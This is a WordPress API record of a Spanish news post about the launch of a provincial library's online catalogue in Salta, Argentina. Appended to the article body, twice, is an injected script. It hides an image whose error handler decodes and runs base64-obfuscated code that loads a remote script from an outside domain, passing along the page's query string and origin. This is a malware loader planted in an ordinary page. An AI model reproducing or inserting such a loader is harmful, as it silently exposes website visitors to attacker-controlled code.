{"id":1468,"date":"2022-09-09T22:28:32","date_gmt":"2022-09-10T01:28:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1468"},"modified":"2025-08-14T00:35:43","modified_gmt":"2025-08-14T03:35:43","slug":"se-realizo-el-lanzamiento-de-la-biblioteca-digital-de-la-biblioteca-provincial-dr-victorino-de-la-plaza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1468","title":{"rendered":"Se realiz\u00f3 el lanzamiento de la Biblioteca Digital de la Biblioteca Provincial Dr. Victorino de la Plaza"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#d30438\"><em>Coordinaci\u00f3n de Bibliotecas y Archivos de Salta junto la Direcci\u00f3n de la Biblioteca Provincial Dr. Victorino de la Plaza, anunciaron m\u00e1s de 150 t\u00edtulos para disfrutar en l\u00ednea.<\/em><\/h4>\n\n\n\n<p>A trav\u00e9s de un proyecto financiado por Consejo Federal de Inversiones, se cre\u00f3 una plataforma con un amplio cat\u00e1logo con el objetivo de cumplir con la dimensi\u00f3n provincial de este organismo y estar presentes con un servicio innovador fuera del radio de acci\u00f3n del edificio.<\/p>\n\n\n\n<p>\u201cLa plataforma cuenta con m\u00e1s de 100 t\u00edtulos, esto significa para la biblioteca un salto cualitativo en materia de TICs, a trav\u00e9s de dispositivos como celulares, tablets y computadoras\u201d, inform\u00f3 Pia Bonzi, directora de la Biblioteca Provincial Dr. Victorino de la Plaza.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/fit.org.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"115\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit-1024x115.jpg\" alt=\"\" class=\"wp-image-1471\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit-1024x115.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit-300x34.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit-768x86.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit-696x78.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit-1068x119.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/logo-2022-fit.jpg 1234w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>\u201cEsta medida responde a una pol\u00edtica que se est\u00e1 abriendo paso en las bibliotecas a nivel internacional y nacional, las bibliotecas digitales permiten que los usuarios remotos puedan disfrutar del pr\u00e9stamo del servicio, aprovechar de la lectura y cubrir la necesidad de acceder a diferentes obras en toda la provincia\u201d indic\u00f3 Paula Bertini, Coordinadora de Bibliotecas y Archivos de Salta.<\/p>\n\n\n\n<p>La plataforma cuenta con t\u00edtulos divididos en categor\u00edas de Inform\u00e1tica y Dise\u00f1o, Historia, Ciencias Sociales, Ciencias Naturales, Educaci\u00f3n, Arquitectura y Construcci\u00f3n, y se encuentra a disposici\u00f3n de estudiantes, j\u00f3venes, profesionales y la comunidad en general, con registro y acceso libre y gratuito.<\/p>\n\n\n\n<p>Acceso a la biblioteca digital, a trav\u00e9s de este link:<\/p>\n\n\n\n<p>Asimismo, se comunic\u00f3 respecto de las presentaciones obtenidas durante la convocatoria para participar de la XII Feria del Libro, a realizarse durante el mes de octubre en la provincia y los escritores seleccionados y destacados del Concurso Literario 2.022, cuyas obras ser\u00e1n publicadas en formato digital e impreso, con el apoyo de la Provincia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizo-el-lanzamiento-de-la-biblioteca-digital-de-la-biblioteca-provincial-dr-victorino-de-la-plaza-84827\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Coordinaci\u00f3n de Bibliotecas y Archivos de Salta junto la Direcci\u00f3n de la Biblioteca Provincial Dr. Victorino de la Plaza, anunciaron m\u00e1s de 150 t\u00edtulos para disfrutar en l\u00ednea. A trav\u00e9s de un proyecto financiado por Consejo Federal de Inversiones, se cre\u00f3 una plataforma con un amplio cat\u00e1logo con el objetivo de cumplir con la dimensi\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1468","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1468"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1468"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1468\/revisions"}],"predecessor-version":[{"id":7354,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1468\/revisions\/7354"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1469"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1468"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1468"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}